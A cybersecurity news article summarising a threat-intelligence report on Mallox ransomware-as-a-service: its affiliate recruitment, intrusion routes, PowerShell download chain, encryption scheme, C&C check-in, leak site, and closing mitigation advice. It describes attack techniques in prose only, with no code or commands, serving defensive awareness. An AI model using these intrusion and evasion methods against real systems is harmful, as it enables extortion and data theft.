Mallox Ransomware Advertised on Dark Web Forums To Join its Team

Mallox, a ransomware-as-a-service (RaaS) operation, began its activities in early 2021. Initially, it employed a highly customized approach, targeting specific victims with unique encryption extensions and ransom notes. 

However, in 2022, Mallox transitioned to a more standardized model, adopting the “Mallox” moniker for all variants, which coincided with the acquisition of the malware’s source code, suggesting a potential change in operators. 

The evolution of Mallox from a tailored to a standardized operation underscores its adaptability and the dynamic nature of the ransomware landscape.

The original ad for Mallox RaaS

The Mallox RaaS, launched in January 2023, recruits affiliates to infiltrate companies and launch ransomware attacks by offering 70-80% of the ransom to affiliates, prioritizing those with access to large networks. 

It has seen significant growth in affiliates in 2022 but has since declined. Despite this, the original five affiliates remain active, suggesting satisfaction with the program’s terms.

The original ad for Mallox RaaS

Mallox ransomware affiliates use various methods to infiltrate victim networks, including spam emails with malicious attachments, exploiting vulnerabilities in internet-facing database servers (MS SQL, PostgreSQL), and brute-force attacks. 

Once in, they typically leverage compromised server processes to download and execute a PowerShell script that fetches a malicious payload (often Remcos RAT or a .NET downloader), which then retrieves the actual encryption Trojan. 

This Trojan avoids encryption on systems with specific language settings (likely to evade detection in certain regions) and disables system defenses before encrypting files. 

Mallox main function

Mallox is ransomware that encrypts data on specified drives using a complex cryptographic scheme by generating a unique identifier for each victim and uses an ECC key agreement to establish a shared secret for encryption. 

It encrypts files using ChaCha20 and AES-128 and appends a technical buffer to encrypted files containing necessary decryption information and also sends victim information to a C&C server before and after encryption.

By employing a more sophisticated key generation scheme, it utilizes ECC and ECDH to derive a shared secret and also encrypts files using AES-256 in GCM mode, with a larger technical buffer added to the end of each encrypted file. 

The ransomware has additional features, including disabling services, terminating processes, and blocking shutdown or restart attempts. To prevent decryption without the attacker’s private key, the Mallox developers likely modified the algorithm in this version.

Key generation scheme in the most recent Mallox version

It initially collects device, network, and user information before sending it to a C&C server via HTTP POST, which responds with “Successfully_added” if successful. 

Mallox has evolved through 12 versions, with significant changes in encryption methods and features. The ransomware uses either generated or embedded keys for encryption. 

Victims are directed to a negotiation portal or email for ransom payment, which provides information about the victim’s case and stolen data. A data leak site lists compromised companies and stolen data.

Page with victim company details

According to Secure List, the Mallox ransomware, a RaaS, has been observed targeting vulnerable companies globally, with Brazil, Vietnam, and China experiencing the most infection attempts. 

To mitigate the risk of falling victim, organizations should avoid exposing RDP to public networks, ensure up-to-date VPN solutions and software, focus on detecting lateral movements and data exfiltration, and implement regular data backups. 

Also Read:

Kaaviya
Kaaviyahttps://cyberpress.org/
Kaaviya is a Security Editor and fellow reporter with Cyber Press. She is covering various cyber security incidents happening in the Cyber Space.

Recent Articles

Related Stories

LEAVE A REPLY

Please enter your comment!
Please enter your name here